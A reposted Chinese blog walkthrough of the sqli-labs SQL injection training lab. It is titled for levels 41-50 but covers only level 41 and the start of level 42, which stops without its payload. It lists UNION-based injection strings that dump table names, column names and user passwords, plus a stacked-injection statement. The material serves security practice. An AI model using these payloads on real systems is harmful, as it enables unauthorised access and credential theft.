码迷,mamicode.com
首页 > 数据库 > 详细

sql-lib闯关秘籍之41-50关

时间:2020-01-27 12:35:41      阅读:123      评论:0      收藏:0      [点我收藏+]

标签:san   escape   database   username   format   user   title   pass   password   

下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关sql-lib闯关秘籍之11-20关sql-lib闯关秘籍之21-30关, sql-lib闯关秘籍之41-50关

不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限!

以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~

第四十一关

这关和第三十九关一样,只是错误没有回显

获得版本和数据库名   ?id=0 union select 1,version(),database() %23

获得表名    ?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

获得列名     ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

获取用户名密码  ?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

技术图片

 

 也是可以堆叠注入的,堆叠注入语句   ?id=1;create table test41 like users;%23

 第四十二关

 熟悉的界面、

技术图片

本来想注册,但是好像不能

技术图片

 

 

 这一关因为user设置了过滤函数mysqli_real_escape_string()
所以我们在密码处构造

 

41-50关结束

该文章有参考了以下的网页:

 

SQL注入靶场sqli-labs 1-65关全部通关教程

SQLi_Labs通关文档【1-65关】

 sqli-labs 1-65教程

sql-lib闯关秘籍之41-50关

标签:san   escape   database   username   format   user   title   pass   password   

原文地址:https://www.cnblogs.com/longshisan/p/12235597.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!